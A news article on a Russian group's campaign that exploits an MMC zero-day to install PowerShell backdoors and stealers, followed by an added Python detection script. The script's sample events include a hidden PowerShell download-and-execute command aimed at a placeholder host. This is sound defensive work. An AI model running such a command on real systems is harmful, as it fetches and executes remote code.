Russian Hackers Exploit Windows Zero-Day to Deploy SilentPrism and DarkWisp Backdoors

Cybersecurity researchers have uncovered a sophisticated cyber campaign by Water Gamayun—a suspected Russian hacking group also known as EncryptHub and LARVA-208—involving the deployment of two new backdoors, SilentPrism and DarkWisp.

Exploiting CVE-2025-26633 for Malware Deployment

The attackers have been actively exploiting CVE-2025-26633 (also referred to as MSC EvilTwin), a vulnerability in the Microsoft Management Console (MMC), to execute malware via malicious .msc files.

Using provisioning packages (.ppkg), signed Microsoft Installer files (.msi), and .msc files, Water Gamayun delivers information stealers and persistent backdoors capable of exfiltrating sensitive data.

SilentPrism and DarkWisp: Stealthy PowerShell-Based Backdoors

The SilentPrism malware operates as a PowerShell implant designed to maintain remote control, execute commands, and establish persistence, while also incorporating anti-analysis techniques to evade detection.

Meanwhile, DarkWisp is another PowerShell-based backdoor used for system reconnaissance, data exfiltration, and long-term persistence. It continuously listens for Base64-encoded commands sent over TCP port 8080, ensuring a steady command-and-control (C&C) connection with the attackers.

Weaponized Loaders and Advanced Stealer Variants

Water Gamayun also deploys a custom malware loader, MSC EvilTwin, which leverages CVE-2025-26633 to execute malicious .msc files, ultimately leading to the installation of Rhadamanthys Stealer. This stealer, along with StealC and EncryptHub Stealer variants, is designed to extract system information, credentials, Wi-Fi passwords, and cryptocurrency wallet recovery phrases.

A notable feature of EncryptHub Stealer is its use of living-off-the-land binaries (LOLBins), specifically IntelliJ’s "runnerw.exe", to proxy the execution of remote PowerShell scripts.
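As an added example that is not part of the article or of Trend Micro's report, the following Python script flags the two behaviours described above over a handful of constructed process-creation events: IntelliJ's runnerw.exe spawning PowerShell, and mmc.exe loading an .msc from a user-writable path. The event field names, the sample paths and the "user-writable directory" heuristic are assumptions for illustration, not indicators from the report.

```python
import ntpath
import re

# Constructed process-creation events (not real telemetry), each carrying
# Sysmon Event ID 1 style fields: ParentImage, Image and CommandLine.
SAMPLE_EVENTS = [
    # benign: the IDE launching its own runner
    {"parent": r"C:\Program Files\JetBrains\IntelliJ IDEA\bin\idea64.exe",
     "image": r"C:\Program Files\JetBrains\IntelliJ IDEA\bin\runnerw.exe",
     "cmdline": r"runnerw.exe C:\Program Files\JetBrains\IntelliJ IDEA\jbr\bin\java.exe -cp app.jar Main"},
    # suspicious: a copied runnerw.exe proxying a remote PowerShell script
    {"parent": r"C:\Users\alice\AppData\Local\Temp\runnerw.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -nop -w hidden -c iex((New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1'))"},
    # suspicious: mmc.exe opening an .msc that lives in a user's Downloads folder
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mmc.exe",
     "cmdline": r"mmc.exe C:\Users\alice\Downloads\WmiMgmt.msc"},
    # benign: an administrator opening a built-in console
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mmc.exe",
     "cmdline": r"mmc.exe C:\Windows\System32\compmgmt.msc"},
]

# Assumption: these directories are writable by an ordinary user, so files
# executed from them deserve more scrutiny than files under System32.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)|ProgramData|Temp)\\",
    re.IGNORECASE)
MSC_ARG = re.compile(r'"?([A-Za-z]:\\[^"\s]+\.msc)"?', re.IGNORECASE)

def classify(event):
    """Return the names of the detection rules one event matches."""
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    hits = []
    # Rule 1: runnerw.exe only needs to start the IDE's JVM; a PowerShell
    # child is the LOLBin proxy-execution pattern attributed to the stealer.
    if parent == "runnerw.exe" and image in ("powershell.exe", "pwsh.exe"):
        hits.append("runnerw_proxies_powershell")
        if USER_WRITABLE.search(event["parent"]):
            hits.append("runnerw_outside_ide_dir")
    # Rule 2: built-in consoles ship under System32, so an .msc loaded from
    # a user-writable path is a triage candidate for malicious .msc delivery.
    if image == "mmc.exe":
        match = MSC_ARG.search(event["cmdline"])
        if match and USER_WRITABLE.search(match.group(1)):
            hits.append("mmc_loads_msc_from_user_path")
    return hits

def scan(events):
    """Map event index -> matched rules, keeping only events with a hit."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}
```

Running scan(SAMPLE_EVENTS) reports events 1 and 2 and stays silent on the two benign ones; in production the same two rules would be expressed against the real telemetry schema rather than these dictionaries.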

Malware Distribution and Remote Control Capabilities

The attackers distribute their malware through malicious MSI installers masquerading as popular messaging apps like DingTalk, QQTalk, and VooV Meeting. These installers download and execute PowerShell scripts to install AnyDesk for remote access and enable attackers to send encoded commands to compromised systems.

Sophisticated Tactics Ensure Persistence and Evasion

Trend Micro researchers highlight Water Gamayun’s adaptability, using signed MSI files, LOLBins, and obfuscated payloads to maintain persistent control over infected systems while concealing their activities.

This campaign underscores the growing complexity of cyber threats, emphasizing the need for proactive security measures to defend against zero-day exploits and advanced malware tactics.